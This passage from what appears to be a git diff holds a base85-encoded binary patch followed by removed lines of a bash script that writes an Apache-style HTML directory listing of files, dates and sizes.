zY*TL*{k~M(U)9w$U8s493k$q-%bb(-sAjA;TdKb#Os1gUNy)uDw_ZB;_{Fw8c|A;q ze8PH$3TsmN(l!QJsr=*rb;3aT7l|@ibsnBh@cCImt`O+4q&2xiti!&Z>D-`w;R%(Y z{#0A!(~TM96!9nh6J#&;dYieIHcvvMtCLM!AjO|*-2|w#>`QxHaA$LK5`xY*Jw9VD zCY`P4!6lI##@Z`>=U)M?j0iDEq5k;&JK60|A>z8jdgTz8guJ2ZRChM63bsGY**w}q z!Y4q&v<4g0?Wyq*@<0hQ;uy)Q>LgKDEGz4zV`95fb1>>4nj(#Q)s!8kI}`fBcC=wM z2ZgpGz+6UG;3wx!8kcSzO#q72tOy=#MBgdGs1)v2LV%Z4mJQ0 z`q?8ZWiJ5ImbgsKxNnM&7;(%%g|Jbpx^kMbOa_}NNQ*GYZn21Z^3u@H1(?j%Rg!%+ zPg0(5qvB$;J2a?SHD-e$#@g|p=2vs#;O(gO(M~&mq9qKyHNa?VjxolZ9gDnVHd&Zo z_~G=;Q>wqEU0hZCm@=^1Q;Kaldnt>tJP1=p z+{kp_uXa|PoRmn`NE)ji;<2j+%uyo;s#@j>x_KtaW@r?{@1q^$B=1y%MuXjWeI2w` z-2P+k@Fl>myv$pYosin~?8kOS`nbM>HW;t5(>xU_`uOzLj%icfanBCNnpVl?oq;>G z%zNOtl><@zRU|l<4A|?@1W4)5(^LY0?l#Y@~jDqqNuPvI^Yd^6Uh zXQ2;3r)0LP331DOb~8{$*B6}6+~`~iL$icEXP@zub$iyWvtN$c`X)@H{St4tiN-Lg z2}1g06HI-uYEBc`FP9N92JocYdXKhbTmUjZ-KE={C3L8D0vT4$E0PZ9oHAQGS|x5P zN`$Oa98GVP2Ok}25MxIU&4T0g0Ah zr+@CbuUvS_?Qf|UBv2`>WA`W5G%tqC7a0UOMq1tbmI-+HInc`*J?fOO|Mjz#In>1tZs_yCA z__971mfPXaQQb~agjY9d&0{*Em77#(L+V$-Yi3K&r;Nr%8?mt&M7*`8NcEtjqwf@^ z$dBSo1WnF0hdef^WdTa!VrLkEH;Jfe#y0Z{o;vga(>9hR@cF#F8e1yF*@CXJN7rs4 zT3JTs^RU5cgv9&qvaS1om5CQwuHSHcx()}Usw;TYCkTkV%ywf*0UWf%Q0wWY6qlBxrI=cUb z^JJkVwqSsx8Fr#=&;bojvLI5RbTGcdcA%-Y3@|sgn*;DA5I$!PC7-RKEPEZ#5zPI zFdEZkROPJmX@kuF{G2Z*W&pDm*N24N1M4dB(ALOX$?Z8hD9fkw(B}o@s$gaP!PaEc zB<9SPY|!X28gyYvL+K8woy4meF)uU_jT9^mX{Z^+FbH}EVE8|0fzW$i!FZDus~JZ` z2J;>lGQhqXXb+Lsl_wPdifcem@(L0Z6`A$N0_zD03Gv2}Ll>J4r)M^Bd8=JUt9Uu* ztAmcRy%<5c80vWkqV9D`FL=d`25_VF#NY^Z6xp>47&6m}X<}k5o4nK3PR)rJ^AQR1 zoTvq7w~LBJqW=S$KxMyBhtx?0RI<}~)|U)iZIvvE%u`G~%i%AFCxef~%jgs7u-f*J zYI?p9OBuodSKJM!7w)I*8=s)44jkXMCp>y{sS-vcPA$yzBQ6|cx((6_FKy8qc z^*zyGc5YT{(v1?dSmDAdp5Or8;w}@m8&H8X8q6s&>fE}WVFL)0q0A_dQJ^dZ%wn9x z4m_ifZy;S$61FUctsUU1WF#wdltLP8?Xr=3?bl-P1DSrN5Do!as;&{B(#w~>}^Sd<^ z*p|Z98nyUMeSMuB!*OA|p$$|0+IA@?vs#m{3C~M+`BeYBH8q^2l2IU|z=lwucu2F< zS|dDZUIrVS7w{b|LY3Q;SUStZ!`c+QY(x23>Etuto1nn96t+>g>Y#bIMiKAVl$y#A|!*4M9JtA>5#RD+uI&|5TEX<(WY;yel1O#j{2Ox za4GEQ-5JiGKO2r5IbwHGbN8(a;dD%PNc*J;HXJ=Fj-zQ(#*PTa0|) z4rjC3WfCqYgwxT=G0`+k`aOeBQ)BV_t)|cPx$|M_{CUgB#Iw(bIT9@#mf|7rZ9_#{2IJRkA`<&NbYBf2dA{SGBf=h6nC5@VY&FLhar?1yOG`Jqr>q z@p1d|lNOC7GM4hf(%j6BTm^&&Yo$Jp90eX0&40 z?!NHKmpv5DoH?U|F%{v&iBpO*Wf;3U+e1rBQ)p{zvm-L8WU|*yOo44FY&S8zv#f1X z3Ls$n|K!my^x4k^-Zzt5PI!-e_3KM!7h&7}Lq8aL-}j#u3Em|mW`Tti&}h7G_imXY zoCre$L!q&$Dcp6}UE%4co(Xr~bFYMFYq%kS+uqS`Guld-g=OOK(hDz!U3>P1%l%i( z($vnKy)yNv3k$SHoVl$-fy}7I)~Ty3r<;@lS0rRF{=fe%Fe}~8j@j|v-}yg7*H67` zI~Q|9%EnD$mq>@$B&2B_LeX(G$^~s9id6)Uole{<`&GatGg@g>g^2! z*RO{so_Hd>;#IFQVOu3Lu${7}JgLo}d-v|m1n!2^*7_smoNXp-*PpH##yf}tr+@7? z!}b69@jIx*AsqO??_~ma4KE$ut zvze`tW=s6Zgzc87rYw`2l>(@YPyF2bH*5AbG+#$Q`9DL;>tDN}Y1}EuF<$77Rp9@h zy*CezG`a2rAF2vwzK_0->6z&v=O#HElA?7}5-pLES6bOx$+7?MuK%!PX=B6d z2x%=VY{jk}Rye|vWl=$j)QVc_pg0^3Ih?z%>AM?^`#uYWLY>&(?`36Gp}GJRdins+ zUv?M1@5?Xqh5AtgBVQ0q0X;Cay&c8TJ>Aj%`E3DAuw&f~x^39>QdSA#B&8}@;SF-Q& zlrV142I~EArTMYXq+MJF>rX$MpGvueLij4V`02S5|lVymk-@+zPdmlhYL zwXG#D=COmjP0naf0<0-Y!ho;8{CpOVxquWX5v=l1jvLZq6m>{f&&b63jSse%eLmP@ z21xQX!_CahNCUP9RO29O8%5vZ!A=ScA*R5e3mTIdS;pCt)Oh5&5RbeHVm*l>Ep@rL zEOQ#`5LpoNla^(i6WRzdoplD7bLC~d=&i{aJI&(4g1BG%?qdtItS2gg ztw6D=7Tm4<5)K^L7PPzT*7dgao86`0gx(7^;AkV?!&e}XjgE}UjT<-R#TQ@1F<4Vj z&A%mw4j;!JxD~zs*`N6-SzKO_$*Czx0bslUq{jLNnZ|Q16iwCv)&#gJ08uiPmSe|{ zOCk}M@zGHQAZi;fgI0ZA1lK5Nq{Zv;=!qDywN(RVpimE5lQ?ji$8xoGbV?j_Tbd&h z!NJS#y!Ezp_jKcI%tp0p;{o8*V!Ob?+?>qK&0`&?2^O|es+>VF)t#Xc&=1M&TX%5O zSEqQ~NG}kOYgeu#OaR)FVVRwqm6}kkG(&k~8pmQ0cp4fT)X;W2v?N)!ciwqN0zrQs zY(ogoZ4J%MEz$@OUxp&l>)-u>oH%t9VX6SgHJ}+rUAO>_>nKZ7w>D&OU5l+swXa&5 zTUsQ6yaoWAKCe$!KyMb43BM0#fue4>jl%E8F=g;Obohu!Iw|p33~OF9;_=ohVF z0jmIB%Tf&x8bkb*l{E=tpCma>a&5`=gvkC&z)eQln!vpWQ5O-Z#@U}Mi}MPEmoMK0Xg?vZ zfB$;`&(FykO>|mR=LE&2E}&*TSi zU#ChA84T`Tn2{tPQp1p_puk)0@ks~(=EpgeTnlFYxK5RYXt<|uKvn?Q1n%?a&&#j>+OI*} zn~~w$w=|!ew6Lzf_q{jd#Oc#=5nU!tf}9%YzHCuC-JT1CmMr!{c+S!|!6xSW#! zFY2HU6M-zm+HII9a0y^`ZV~y&Vj?gvb*KY1H~?B604>GtoTT{hjl5M5&BM+u!Ilz$ z*@b0H8q!ibzbHWOl9uuKJyMj+Uv-Jmi^s1fDl0L^4*RPt#%@FHcg}G0>NWK!%#zM- z>tSz(ceeiQ^1HCJBq6d)Ccz;Ah$xO#*(6xSKuuWJBi$~Ka*IiFOc?az@ihe*0x*Fs z0C47_X$=PPXml0eQl-F~g4mS%>bwy5y1}xp;2p)t1agXzYXU)CNA-F=;9OxJ6+lD) zO@fO|(q1Y=(y`SwthZv{UeKr98IplWHy}44`Wze_RI4-OPzf6C?d=NUF^EoeLp?ZT zuNM;qtauV|6W|ib@utC*a{ZX)xOVlb)C0T@9XX=wqFmQy7ms5C5{Wb_NKs6jN+m%f zh-(VmB(Mqjs)q=flY{x$If)^>yBdbuk+&$`O-xQ>g5i>r$B%&%pI32tCdswc1jNW* zaI6UlB2SbIxKYmQSFeC(R607k)cOu559GQz5u%y93`Ft?d?#O^MqD1O*-Nb0Z5JMI&!Y2 ztcIxmWl)q^Gp!0{rsnvKNRKtl2@W<>AdCr?zcn8g;TVP`=eITWUzJnLn*6=rm&xDz zcP8#*{4iyxGfp_30wKm78*z)1AbU?!}3(U)o1huoD)M;-tUMaFatmlYj4W zRaHetg@G`|tc_SRrL%yTkA(Mkr=E+i?@UMylh35d12v7qVQ34JZb=z7K%7GmbHDoxDo_Kw?*iK0liCzR=^}63UQ{WJ6_;ld zv4`-mx`Qp@`<4Z)eY<;l?i;xWL8$nUg$F_3q3P7XL8$=;Y!Awpbjoq?Y5?1hj{Sds zDWU)H`{Kq{tG(!Ws*&TI8gOc0=NfRpcIP^BLO3<>$ZEh3Ww)b0^9AYp=3hwo5B@K4 zLu=e|`?Ut3F94kYss)%I6{gZTKcl};S~3%UuZzw~bL~8rtAPW%^~W?%G~jZjuF%hj zH18H|TAHOIPwQVHc_-LDt$}pW`LqwK2u+=x((p4sEu&99A&DQnDXah6zkFCpZ<`L= zywmOrRa81A*f#{tEY$L8>5SU>)JUdMVkVQsvW!P9oYBgebqr61L^^8MA5>>26RZ#J zY@i|$cWZFVA(x5{k~@%Jk@}|TjkLtGut1cB$wAfSt^Bj`6JuAY)VTcOcX_3{%7e8; z^WmxEnx;hvj4-MdoFmJbs^cDy8i;@RXhf&f{_cYzl%?ioNuGH^s^551V*khg`A93B z)7ccbGsm$8jOMxFn%*WwTk`pWf8m0FX&ads`d!r#GlR z1nZRG!)<{y1KZivxtUh}iDQyEq`>YB$iLbrHw07y>?G^}a9bpYQEq+YHpPRq^@pG1 zz=18nFePc3Pc6&e-F{vE`u4XaS`~)@g;F#u?hJfacu!!h%?9Kr5B-RIw(n(W_7+5U z8365kJSyWeur35GT0_OeC&=%{-Ib-?M0UbHwlz=>#i_b8XJibT;hC3T5YKmBm(_ps zyN{$kVsE}BAC6pmBxyhDL}_cAPPc>sG}0SM>27J4NT5;2hT{AwfWk1!@SS07!xOoR z1K}H*>SP6`SGga3`rMR^4Bf##a@bUdsn)UaN$KnAf#H=|>Fn;5JHx}+N8TwD6WEWA zai<^F;Ks*CX`oJC{md)U(cYr_?2FUf5BJP}99t1rVGM}oX34bBrh6P)`)Hb#MsV=| zK)3@3w)`%Hz;$r7*XM?0%C#uVt{C=A5{BWpR}vkA-Go2#r)H0-c~T#QiB{Ffhch?j zg`ST~BU*sR#=$*j^0W-qTGyofuBB#n$STo_{v41tR8d(EQlJ}qpfKbJczE~b(B!9$@1dbv zYM{msi*FkkOE_s?Sy|TaNegr}02x|CtHZaYL6y0gSvhgy1T3Y|*h@g3IQaxP5RI@T2}w(%%IwrM_7)J_wsw95{!1LF=T*jDN3FY8zjNn`d&u9mYS|ArUh zVK?5vjm9zJ*%gUUDzYvhrY%+S&%}E3d_sPQIf(#Dy!$1uVl5cKAoRcs|y2=gjuuIMZHtZNwNOM2jv8I9nKgv@L(fV|5 zO*;#2KcuE#_d^*f&EtUsTP?V@I~==)FKOqV{tcges^b|18}mdze?I(wSFjw6`ZBa`Ju6oPF4=2m-qdS#;rAs7g3o8jCrs$c?7 zkY+e44IMpt821>3db_mP^wVbzBhu2+sQw&x=+Aij(Qzd8!dT8=U!RJOd3qUby?bEF zmGz<3v>yvrCeH^FYzc_Q5i-q_8z;7O187IC4N33Oe(~VhG<1e6#NZQSnVBN#SXwzR zJZGVN3kR$NwdT1^CDWQ4%zu}01X}yTUdse4_Og|3hPdK4`|RFG z9jj0=6p;sEFWyWZ_E|A1$ZmySwgO6fB#3GB1)wA6YW|7LFU-qxC!Q78I?hntfU$o7 zF0qvDRc+wn!LGmRHP7`L3K@ue;whZBx*o?-a5!m)@AC+1T0ce3DTtn<(1M;%M`bFt zC=;m#nNBatLMEyj(tK}18z{H;tU}(G`|(|=D-BotzVw}awqfiuuXM%FkNV!^h<}X$ zzcfGgeX0LW&-WUyl&+<-SFar%9SXY4UkqkCz5n8W5!c6_d0^Qst)Iu`neDUKvD~|N zyNP9M7O8OD$&Wp|Pj&CaFy$xX!vjVLwEI*dzGIahNY2(^Bmokgfr?T1kQDyTGMAgvK)Re=llK>|$XnCrprmzER#P~MCs;2hn~%sR+n$yFV29MZal9S=+5V#G z8xpxRK~3{*6EOU+c`^q6?coRNhd%{QU5l(A-%KA&D*S8eW^-7ky(ulm)M>hAAa~1D zOzMVu5lx0Kb_mAkHcxzRdjJ4H07*naRJ6I{Q}Nu61C{1TV;1i4$e{RcR370;Mm8^| zj`>{>8X4A(iJ<&8q{U}CPLxdA=Gml5ALDB;45<$BG)aw%P^b^H1c6qgFBpzTLhK*M z6QzzoBscoCzmV7;KiKu#{Zuda_X}<=Ia`tW?VO5fZ@KoU?a;JA#?)468)TjoJ&MEg zh4n*>T-!I%O2g%e?7bWI@0??~^+_wh`W~F?fdku3-^n72elHH7XwVo)8>(yNi>H5F zemMG`++G|JKMpw$1w%5uIxDxL!;-AJTe~k!u#H1apJ&GsCfUAo?Z9x)(5l0~iS(Sj zKKZtM`}P|$iTmY^m~KUyip|StY*KE|4$F@YeoCHgdP3@5VXOzcHBTw1y7Qp*Rh*N$ z0Y!@-kJDR=NgpN$Tsw|I8Db8Tg|7B4UE{D#kmuY^;n4a}O$cY?hVy`9a%Vxugw~E| zGi?c=KGty}(D?Y6boKY?26`R_!1%MXGrHd|f_#co}FYrg2U!H8kt6Hp$}zvIxVC@GhJ=ONA1fKa-A4 z&E%3(74BVRnRqsBQ&SUydt?R23Q`-g30k7u*T?q3=QOVT=8HJ)FAQZ3u7}zI&6a7e zUU{hd{Y9&)}o+!Xr6-HEeB+E#C__UZ1h`G9;?95El1o`n~@quYj} z3E=#FWHoT$z_xr%5_I?vV&KfWjEvlr-o8G7-lt`LeNm$6m|VMaT?V?(%IM`uN#O8u zIt!v~!Bo!=1CZxe7Nizuq`IMXNI$ZQY~U0O$2ZpH{h3ShmpA`b##2+0aHUnyv;kzs z3AmDgcJxa0lF021X$dyVNq~HSGzfS&d-a{S-<0ou_jT#$KQ2cP9h1xF&&jX<^M8hO zbFnobx&*LYl=}Kc@u#cx1RfsNPL=s9INPW1%Yr5Wk^noce1Rq)+hX(SF>brfjtvXZnKn@a;P?K0PTfy!4{hqpph~Kcq!dcub4s zrvizB?feq*nNUTdAhbf4u(XiIMCWO6g0x)2dRoII=i-&CFecC~S7E@S2m2ho)c|y8 zpOeO3b;+@D8U2^PElc0}o4uOF1D`LB1zR~Dcgb#tCZ7jIPAtvj*2LmFhS9${iH!|y zmaR+x_FMK8Jr#>g1pmR0w3r7Y>oLzt&iV7mYv3^fThm<0o2>zCKbXBLe>w5G^!0U1 zH$=*wEOm|zpqekjW{k$GodeAljkp?vb)63fk=JEqd~QrS8rm@E2SM02{`7UcZY zhccd+mAIP+$MZFKFbwv7j}KgFS1@4fb#oO$YL`RSkf2|Xl!dTLf) z`}TJ58T$3+-@n__3{^qY_Wpzb<{ujO^?|*PfE`NAK+FG0C`RC5c z_rCibaMB6+%qKsAy?oR1NB_@%lnq}{zVMHKPP$uLWG%WZ=iYx${_B7HbNS-WeGvfX zl5c$d8*&l`70y2MG5M1}`C}Xy-z2~Ar7ufody{jbS5pgZVdwnv+~uid>z{aCgn4)z9Pf7Zpsb(>gwv{FTVO! z@nenh=fC_V>Fw^4H(q}YgHe@SyKzHWTHA5({Y`o5>5t3Q*ligby)D(@dg*9uma(Cm z@@Ieg75SMjeo>9J`8dgQNeW{BR0>NcXtR`N4c)w| zlj~3&G>Y|ECpIFzBH6OwkL!=S;tvQYQ0@=LuZEIn;K zvb??|H?f8rt%}LznQM~jHD({tyV#eoK1uElvr#NuxB$|KEOpO}XTNK>xDmKUa(V5(G_Uto~h{xsnwd=@@OMVK*>uLV1sVO4!i?iV7N3fU8 zD_{O6Uy{H3>u<{W58ji3{$4q9?2N3hLUfJ#`OIftl{YV3mRWGnUCm88OFjbgfQOHV zK=%eT1%q2;u2ksN(;hx{WY?H0i?aPQR4BKG)Efc@X=E;bmNu`j}FV1{>d-O z58r-YCMRa4t*HTA_*HrFrI%q1rvm^#33GH&`K2%af?UGnplWeh8k$?>#FSbwd3ZnFNh=G@6bbLa-jO{I13@(Fx1G+~q1kSV$B7SeEMyBWHq`R{n zfL<@}VX|;%WLTD?YY;X2C50-l0$2RxlV`+R-vnzuQR&I_$(a*R%Eb7nq%kOl!U1{a z>{F019G2nhSLG9*cu{WMzJcFOnVp;6Ghpk0?EV?9IekxJU+o=OkgBUk-(6hP=QJc! zZjV>GIy>aX_3P;WUP-2sm_&Qgz7yDIyC5UuQ{sbU$>(z;PFw<5GMb#6kw`-mmQmum z^uvk#I>4ImV(6a%7|e)ZKW=Ax+y1Gf1D;b1WsirWDpGfAx4e7hJ?U)igjhEri`iwF z+?bP#t2g9(SZBQ!y{%wN_$0$xg;^(^ij&oYkV~~D%t9e9r3gqJz>@2G(e#=ur=oye z&Q9IZR^KkIo`{_7dP-V-gv*H}H5r`e3dE(+an4NL*n7qU-@7_m z(DD4bK55=pV-tI$ETXf<0lrn3wo-gFH9aL$;7+-=*Z}J@t<4cxfQWPzfSd-xP>f2@ zqJK+kM4BQEGB>v%Lofq3F*PmKn22IQ7iZ)=Q5E!6lM0d}JRd1`w5y=I18he^#W%(0CQ-$A}o zx`sN#&FmO-yhytRN69rcHG_5-v-)~ni>9TWY79smP-^RHv3{G8p*us!{|w&O0Q_UH zI1|^h)6VJwxCSJt>#{d)T$eN8#53uPw6%9={n89v2$BSv!sGXhz(gMFgLThx_yRtN zpA%ZP+S(8}kQVG~Y*uA08c2WCE`y2I=x_dxT>RJz4mbO#KgMp-$2d`27glqGY@=)F zzqQaoxOMX;+V8q7lIsndtuL#viOk6~B|5in-GYUwD8?LUg`gh}kBsUhpW{I+zOH&6 z(~|&XOr|+5+<+v96YVs(WOB}q+Z#1-AURt?B5}}Qp}C`WX|gJ9el93Lxwy(oSj?@@ za&%UQxI|HiYFzx~De=7l+rnQ%TSs=N?6_UnP6Xv9T9a{u#z0NCJbC1#%wfIt`?r25 zGf5~Mxv_of}d%>I(q323@=SrC<0tfI@?O{A16G+v}4-Y>2M` z0Mc;5*{9D+e_xLR#PiQTCyNlhX3;SZA37pS=$Q2Y+@?=`QigiFvDWC3`i2NV+#?O> z+@E~;6MCJ1@$UqHwY#%RPMtc2v})y3FTDusEn)Eh@K2sTgUkVVtE$1R9tGD2?j2ks zImQ+!O@%_R`~u+W>mN`sJoDsPh{2K)fI?Gyf4BI-br0RSBTt+vJuw)3`jt;X z9DG|R3Ef>?au%HO?ChMJdHNYBI(aZa2xjpfiMO>P52#N}COC+M8(RVR0(+@J8SMXc zSzcO{KGcU709+5QIsz{Hxfdwx73m)w(0XZsSo&9g#R(i^Y# zSxBXI8HW>HI}+}kODDvGtN}1@2XE?=0YKbdpOQa(_rJ)S>lbu;j}QB52kW|}rKTBN z<-FWl0T&CXwcM!!UaqDIrr}ILo)4UsfBvywmOg){v5kzt+}cB}w1#naGHNsM{h+A7YLuJ0Gpu;d+;~@u3N6lSoB{LsX9HLm7j-Qs{`7;~p zsgy(-2&+m%P)I^JRbYa@QD{QSC?}P#m<|=NY-eR$tK4K2qIh*7P14^0T>?J0>o6=G zIZfr%kyk2|kt;&5*U;8ur_}E_AKS$@s#qIN8jA@c;7f%W+INKL_WqTvX$~MM+ z==A|0;qXe^nvKP<+Jn9E^VgpHG@3|VcZrR;$Y;37s1Q`8c~@+ z3c)ttv2(QrB62EnR4y)Ehlm==5ZOhUn}SG_8NeXU8=ruKs&11PThGG2a-l<-0X_FQ zkU!OQW*qh^_`eo=xFS4n{uen2#L-|d(iq8^vK~>0gUM3LS+!l ztRsHg&dKsu0d%diY1#J*$N)!T7W1jV3+|qT8HVYq*cI3hmIu6Ht(j3yLO)$`=fxTq^h1a>~KAF7D06 z1O694pW#T~Y@8@J7&2c7!vZ}dM=fK=9lRPa?QG|AZ5NL3iUGWsTBTrK9LKqTur+Wn z!4_j-9k%8Cqr;z&&e;|yLm6cz4zy;VBp1V<+4ojDbSl`2S57t^lQ8J$IF3Nd6#*pp zuhfwSL9x}{AYVB4BhnJ8mrL{4Wdb7Sb%>0@-k@}aTIA{0)ACHqDXF7D3l7?(3-FHNb%!19&JpNScHYRgRS6W&#vBK|6akeYou$(h6K*7^LxW|`y zXWs0O6{6fQ65~6H+UH;tg!Fkd7uSb%|1UUmZl~Z0D^u9gLlJWuwgCm9)y9RG(^0|ygqF<28MpNt%n)A;E) zt~FX{j4lk$3Y+j!lYAvLPA-`6sa$0auna)6kr(I`N29`W(B+ptcdIn_y(-VQJ|#2p zB^=e4#&LWBY4KxUr@tB7fvSxX76C+Q0k{C1*REfa4k-Q1V-IN*+i|Gq6oaNMx6@1m zC}_}v;bx#v)Z5#u*|>1wq5@|-w0NhX@RUMcxm~BPw?}T?yeVU2V`?Y&(xpqPKtT&k z!_W|>#iXN0jtR9MFI~7GA71_tTDwmG@F%bxXH8yt*z<0zDkxNmSBCu37nn>EA~Fl~p1@MY|6?I-vGw1UtOZow860%|w*j!OVbnm6PYpDJiZuEIGpY$3h9xbUQyc||612FN zcO0PmxzD~Tqhlkw^@kjI8eHnT@4hQNm>|qAtpJ3V4FCH5;$>kyWF}&FrS4<#R&H2vK}_T#SYyX zlB35@s)pw*wiR)|^U}hK1ZrVC0Ah*+>fqM(8{&u7G{y0>NJWObFqzsVtIMd5sq;8o z{ylwpP96(xivcJPs&-CYnA_-171xZ9FCIu`j>(B=c&IGLF@WAOdY!j-*p5)b)W${5g%)_*4 za*~nKaJQO<@gqaBu*?2?Z;F2+b%~14KUf;GC?1YdeO6rwQ~&j~&sC z?bW_&81JuFprOHjuGJcFK@I^xftsVbMoJ4&NdOo%mkIt}h>83A`jD?~0J{(VX4_6R z{0Uh67pe;ZRNIv!c7sD4a1ZL<*S1c-DJb$m4!#>)Z5-Bayx1??jdF4gmFucJIJy~o zWO;~!ZbL%WXjG#bdu$1|h5;~ZwOohhAk_>B0IysVZU@j3K&kay4=#&!$7gcrq~8Nh znB2Sv_a1Vv_%{Nh0LQ@jHZ;`b>)K?tvcG{-4#3!&awZkLltNhi3^wiD~Uc)>SZu)RxYy^EY6x~?G`YJda- zhXg*NjtVw$ubmZFJ^L}Ify;MPvf?|^(8B=$I=r{e&J@{*^Nz2XZ}T6?sD}a^!J0}( zjAt4@V;PD%i7<=W`cCuBe8Op14XKZt{%9U-`V5bI%@6MRX!C2zp37%Zb~h2rJ(MjM z-WB^7-!mFT?7E*B6NWk)XaMY zHNDNHnNJ$2@IMpFrEJ1-uPQ)i6YcmdnGB>f#aMSaB85k z8rU?HRu;txWoqEw2I-w^Z!=xOg2fT8*V0)(b7gq^a-KG<2HfsXX~50N7GiGl&n05t z=E2o^@M zpWE`?iidsQAw`@=q#C3u^4mIF_?MM2`cJL+$-Ah%LA|5kiM8?H$EOm04 z#oVevSo$&TLX5&4>6N;ox4bR>ZK8u0_FXXv>&L4NZ~ZiasR#ZwKjzv#6%o?-MbG6D zvve!H7L&90nvPAM*PP3zUrO8t*y_q}4wIWd|Fc3d>f`DHCyz_m*<*{(PmskLY!%zZ zJpyhn8ZUVY_MzMr;mW#vWb>Afc7!S$-tl~>HBdDAJk)d#NMabM?O1I~RIYP4eg(#L zuhfP8Uc0{94~|o${`cS7b?k!@q5F6K)j=uBBPxgO2uPkyssOW_ZZ~%v87HrU{mAE}>$iVX z#(wK}?wQ7ZjM)2ce^)}!Kbu!V+mB_qzj-zWV0VHydsv78MD8#LucP`3RM-O-sszkE z2Nz?t&E(YTCQuQQ3V#gBkweX(=7ta|{Tay@t*w#UHuUdrSsiNkS_2N)?y~0C$f

    ../
    -	EOF
    -
    -	# start of content output
    -	(
    -	# change IFS locally within subshell so the for loop saves line correctly to L var
    -	IFS=$'\n';
    -
    -	# pretty sweet, will mimick the normal apache output. skipping "index" and hidden files
    -	for L in $(find -L . -mount -depth -maxdepth 1 -type f ! -name 'index' ! -name '.*' -prune -printf "%f|@_@%Td-%Tb-%TY %Tk:%TM  @%f@\n"|sort|column -t -s '|' | sed 's,\([\ ]\+\)@_@,\1,g');
    -	do
    -		# file
    -		F=$(sed -e 's,^.*@\([^@]\+\)@.*$,\1,g'<<<"$L");
    -
    -		# file with file size
    -		F=$(du -bh $F | cut -f1);
    -
    -		# output with correct format
    -		sed -e 's,\ @.*$, '"$F"',g'<<<"$L";
    -	done;
    -	) >> $index_file;
    -
    -	# now output a list of all directories in this dir (maxdepth 1) other than '.' outputting in a sorted manner exactly like apache
    -	find -L . -mount -depth -maxdepth 1 -type d ! -name '.' -printf "%-43f@_@%Td-%Tb-%TY %Tk:%TM  -\n"|sort -d|sed 's,\([\ ]\+\)@_@,/\1,g' >> $index_file
    -
    -	# print the footer html
    -	echo "